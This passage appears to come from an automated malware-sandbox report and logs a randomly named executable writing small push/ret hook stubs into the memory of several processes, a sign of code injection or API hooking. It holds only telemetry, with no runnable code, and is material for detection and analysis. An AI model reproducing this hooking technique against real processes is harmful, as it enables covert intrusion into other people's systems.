                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 74D6EA60 value: 68 13 B9 42 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 74D758A0 value: 68 4B B9 42 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 74D6DFF0 value: 68 6C B9 42 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 75A8EA50 value: 68 5D 12 41 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 75A8E8E0 value: 68 9A 12 41 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 75C0B390 value: 68 95 EE 40 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 75C0B400 value: 68 C7 EE 40 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 75BF7D00 value: 68 01 EF 40 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 75509390 value: 68 FE CD 42 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 74D8FF10 value: 68 B0 B4 42 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 74D6A810 value: 68 20 B5 42 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 76F03710 value: 68 37 A4 5D 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 76EDDE80 value: 68 A3 A5 5D 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 74DF4100 value: 68 AE A8 5D 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 74DF3330 value: 68 33 A9 5D 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 75AA4190 value: 68 99 A9 5D 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 75A90560 value: 68 B0 A9 5D 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 74D6EA60 value: 68 13 B9 5F 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 74D758A0 value: 68 4B B9 5F 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 74D6DFF0 value: 68 6C B9 5F 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 75A8EA50 value: 68 5D 12 5E 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 75A8E8E0 value: 68 9A 12 5E 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 75C0B390 value: 68 95 EE 5D 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 75C0B400 value: 68 C7 EE 5D 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 75BF7D00 value: 68 01 EF 5D 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 75509390 value: 68 FE CD 5F 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 74D8FF10 value: 68 B0 B4 5F 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2996 base: 74D6A810 value: 68 20 B5 5F 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 76F03710 value: 68 37 A4 CA 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 76EDDE80 value: 68 A3 A5 CA 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 74DF4100 value: 68 AE A8 CA 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 74DF3330 value: 68 33 A9 CA 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 75AA4190 value: 68 99 A9 CA 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 75A90560 value: 68 B0 A9 CA 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 74D6EA60 value: 68 13 B9 CC 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 74D758A0 value: 68 4B B9 CC 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 74D6DFF0 value: 68 6C B9 CC 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 75A8EA50 value: 68 5D 12 CB 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 75A8E8E0 value: 68 9A 12 CB 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 75C0B390 value: 68 95 EE CA 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 75C0B400 value: 68 C7 EE CA 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 75BF7D00 value: 68 01 EF CA 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 75509390 value: 68 FE CD CC 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 74D8FF10 value: 68 B0 B4 CC 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 74D6A810 value: 68 20 B5 CC 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 76F03710 value: 68 37 A4 C9 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 76EDDE80 value: 68 A3 A5 C9 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 74DF4100 value: 68 AE A8 C9 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 74DF3330 value: 68 33 A9 C9 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 75AA4190 value: 68 99 A9 C9 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 75A90560 value: 68 B0 A9 C9 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 74D6EA60 value: 68 13 B9 CB 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 74D758A0 value: 68 4B B9 CB 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 74D6DFF0 value: 68 6C B9 CB 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 75A8EA50 value: 68 5D 12 CA 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 75A8E8E0 value: 68 9A 12 CA 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 75C0B390 value: 68 95 EE C9 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 75C0B400 value: 68 C7 EE C9 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 75BF7D00 value: 68 01 EF C9 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 75509390 value: 68 FE CD CB 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 74D8FF10 value: 68 B0 B4 CB 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 74D6A810 value: 68 20 B5 CB 00 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 76F03710 value: 68 37 A4 F5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 76EDDE80 value: 68 A3 A5 F5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 74DF4100 value: 68 AE A8 F5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 74DF3330 value: 68 33 A9 F5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 75AA4190 value: 68 99 A9 F5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 75A90560 value: 68 B0 A9 F5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 74D6EA60 value: 68 13 B9 F7 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 74D758A0 value: 68 4B B9 F7 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 74D6DFF0 value: 68 6C B9 F7 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 75A8EA50 value: 68 5D 12 F6 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 75A8E8E0 value: 68 9A 12 F6 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 75C0B390 value: 68 95 EE F5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 75C0B400 value: 68 C7 EE F5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 75BF7D00 value: 68 01 EF F5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 75509390 value: 68 FE CD F7 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 74D8FF10 value: 68 B0 B4 F7 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 74D6A810 value: 68 20 B5 F7 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 76F03710 value: 68 37 A4 B3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 76EDDE80 value: 68 A3 A5 B3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 74DF4100 value: 68 AE A8 B3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 74DF3330 value: 68 33 A9 B3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 75AA4190 value: 68 99 A9 B3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 75A90560 value: 68 B0 A9 B3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 74D6EA60 value: 68 13 B9 B5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 74D758A0 value: 68 4B B9 B5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 74D6DFF0 value: 68 6C B9 B5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 75A8EA50 value: 68 5D 12 B4 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 75A8E8E0 value: 68 9A 12 B4 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 75C0B390 value: 68 95 EE B3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 75C0B400 value: 68 C7 EE B3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 75BF7D00 value: 68 01 EF B3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 75509390 value: 68 FE CD B5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 74D8FF10 value: 68 B0 B4 B5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 74D6A810 value: 68 20 B5 B5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 76F03710 value: 68 37 A4 39 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 76EDDE80 value: 68 A3 A5 39 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 74DF4100 value: 68 AE A8 39 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 74DF3330 value: 68 33 A9 39 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 75AA4190 value: 68 99 A9 39 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 75A90560 value: 68 B0 A9 39 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 74D6EA60 value: 68 13 B9 3B 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 74D758A0 value: 68 4B B9 3B 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 74D6DFF0 value: 68 6C B9 3B 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 75A8EA50 value: 68 5D 12 3A 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 75A8E8E0 value: 68 9A 12 3A 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 75C0B390 value: 68 95 EE 39 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 75C0B400 value: 68 C7 EE 39 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 75BF7D00 value: 68 01 EF 39 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 75509390 value: 68 FE CD 3B 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 74D8FF10 value: 68 B0 B4 3B 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 74D6A810 value: 68 20 B5 3B 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 76F03710 value: 68 37 A4 C9 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 76EDDE80 value: 68 A3 A5 C9 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 74DF4100 value: 68 AE A8 C9 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 74DF3330 value: 68 33 A9 C9 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 75AA4190 value: 68 99 A9 C9 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 75A90560 value: 68 B0 A9 C9 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 74D6EA60 value: 68 13 B9 CB 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 74D758A0 value: 68 4B B9 CB 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 74D6DFF0 value: 68 6C B9 CB 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 75A8EA50 value: 68 5D 12 CA 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 75A8E8E0 value: 68 9A 12 CA 02 C3
